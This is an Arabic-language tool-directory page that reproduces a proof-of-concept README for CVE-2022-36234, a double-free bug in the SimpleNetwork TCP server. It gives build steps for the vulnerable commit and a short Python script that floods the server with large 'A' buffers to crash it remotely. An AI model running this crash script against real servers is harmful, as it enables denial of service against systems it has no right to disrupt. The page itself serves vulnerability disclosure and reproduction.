Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-36234 — إثبات المفهوم لـ CVE-2022-36234 | Kitploit
أدوات/GitHubGitHub/halcy0nic/cve-2022-36234
تحليل الثغرات الأمنيةالاستغلالالاختبار العشوائياختبار الاختراقالتعلم والتعليماستغلال الملفات الثنائية
GitHubhalcy0nic/cve-2022-36234

CVE-2022-36234

إثبات المفهوم لـ CVE-2022-36234

عرض المستودع
2منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

وصف CVE-2022-36234

اكتُشف أن خادم SimpleNetwork TCP Server في commit 29bc615f0d9910eb2f59aa8dff1f54f0e3af4496 يحتوي على ثغرة تحرير مزدوج (double free) يمكن استغلالها عبر حزم TCP مصممة خصيصًا. سيسمح تفعيل التحرير المزدوج للعملاء بتعطيل أي خادم SimpleNetwork TCP عن بُعد. وفي حالات أخرى، يمكن لثغرات التحرير المزدوج أن تسبب سلوكًا غير محدد وربما تنفيذ كود في الظروف المناسبة.

إعادة الإنتاج

للتأكد من أن لديك أدوات البناء القياسية المطلوبة لتجميع المكتبة، قم بتثبيت الحزم التالية (على معظم الأنظمة ستكون مثبتة بالفعل):

root@kitploit:~
sudo apt-get install build-essential git

يمكن إعادة إنتاج الثغرة عن طريق إرسال طلبات متتالية إلى الخادم تحتوي على مخزن مؤقت كبير من الأحرف في حزمة TCP. أولاً، قم بتجميع مكتبة 'libSimpleNetwork' والخادم المثال المرفق في الكود المصدري:

root@kitploit:~
git clone https://github.com/kashimAstro/SimpleNetwork.git
cd SimpleNetwork
git checkout 29bc615f0d9910eb2f59aa8dff1f54f0e3af4496
cd src
make
cd ../example-server
make

تشغيل الخادم المثال:

root@kitploit:~
./server 80 1

احفظ سكربت إثبات المفهوم التالي بلغة python3 في ملف (عدّل المضيف حسب الحاجة):

root@kitploit:~
import socket

host = "localhost"
port = 80                   # The same port as used by the server
buf = b'A'*10000

try:
    for i in range(50):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.sendall(buf)
        data = s.recv(1024)
        s.close()
        print('Received', repr(data))
except:
    print("Completed...")

نفّذ سكربت python3:

root@kitploit:~
python3 poc.py

التحقق من الانهيار:

إذا نجح الاستغلال، سينهار الخادم وسترى المخرجات التالية من التطبيق:

root@kitploit:~
segmentation fault  ./server 80 1

المراجع

  • https://owasp.org/www-community/vulnerabilities/Doubly_freeing_memory
  • https://cwe.mitre.org/data/definitions/415.html
  • https://github.com/kashimAstro/SimpleNetwork/issues/22
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36234
تنزيل الأداة